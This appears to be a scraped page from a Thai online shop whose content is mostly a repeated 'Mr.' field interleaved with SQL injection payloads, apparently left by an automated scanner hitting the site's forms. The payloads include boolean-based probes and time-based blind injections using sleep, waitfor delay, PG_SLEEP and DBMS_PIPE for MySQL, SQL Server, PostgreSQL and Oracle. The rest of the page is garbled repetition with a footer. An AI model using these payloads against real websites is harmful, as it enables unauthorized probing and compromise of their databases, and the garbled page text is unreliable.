Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

-1 OR 2+262-262-1=0+0+0+1 --

Mr.

-1 OR 3+262-262-1=0+0+0+1 --

Mr.

-1 OR 3*2<(0+5+262-262) --

Mr.

-1 OR 3*2>(0+5+262-262) --

Mr.

-1 OR 2+631-631-1=0+0+0+1

Mr.

-1 OR 3+631-631-1=0+0+0+1

Mr.

-1 OR 3*2<(0+5+631-631)

Mr.

-1 OR 3*2>(0+5+631-631)

Mr.

-1' OR 2+183-183-1=0+0+0+1 --

Mr.

-1' OR 3+183-183-1=0+0+0+1 --

Mr.

-1' OR 3*2<(0+5+183-183) --

Mr.

-1' OR 3*2>(0+5+183-183) --

Mr.

-1' OR 2+566-566-1=0+0+0+1 or '6mWY3Wkf'='

Mr.

-1' OR 3+566-566-1=0+0+0+1 or '6mWY3Wkf'='

Mr.

-1' OR 3*2<(0+5+566-566) or '6mWY3Wkf'='

Mr.

-1' OR 3*2>(0+5+566-566) or '6mWY3Wkf'='

Mr.

-1" OR 2+941-941-1=0+0+0+1 --

Mr.

-1" OR 3+941-941-1=0+0+0+1 --

Mr.

-1" OR 3*2<(0+5+941-941) --

Mr.

-1" OR 3*2>(0+5+941-941) --

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

-1; waitfor delay '0:0:15' --

Mr.

-1); waitfor delay '0:0:15' --

Mr.

1 waitfor delay '0:0:15' --

Mr.

xwEnSCZg'; waitfor delay '0:0:15' --

Mr.

-5 OR 657=(SELECT 657 FROM PG_SLEEP(15))--

Mr.

-5) OR 735=(SELECT 735 FROM PG_SLEEP(15))--

Mr.

-1)) OR 109=(SELECT 109 FROM PG_SLEEP(15))--

Mr.

RR31gpBk' OR 759=(SELECT 759 FROM PG_SLEEP(15))--

Mr.

Y1SGTK0p') OR 650=(SELECT 650 FROM PG_SLEEP(15))--

Mr.

QLYhPzdS')) OR 728=(SELECT 728 FROM PG_SLEEP(15))--

Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr.

1'"

Mr.

@@ci9Hx

Mr.

Mr.

-1 OR 2+886-886-1=0+0+0+1 --

-1 OR 3+886-886-1=0+0+0+1 --

-1 OR 3*2<(0+5+886-886) --

-1 OR 3*2>(0+5+886-886) --

-1 OR 2+185-185-1=0+0+0+1

-1 OR 3+185-185-1=0+0+0+1

-1 OR 3*2<(0+5+185-185)

-1 OR 3*2>(0+5+185-185)

1

1

1

1

-1" OR 2+906-906-1=0+0+0+1 --

-1" OR 3+906-906-1=0+0+0+1 --

-1" OR 3*2<(0+5+906-906) --

-1" OR 3*2>(0+5+906-906) --

if(now()=sysdate(),sleep(15),0)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.


ติดต่อสอบถามผ่าน LINE
เพิ่มเพื่อน

Copyright 2015-2023 lifesential.shop
One framework, every device. v2
Contact Admin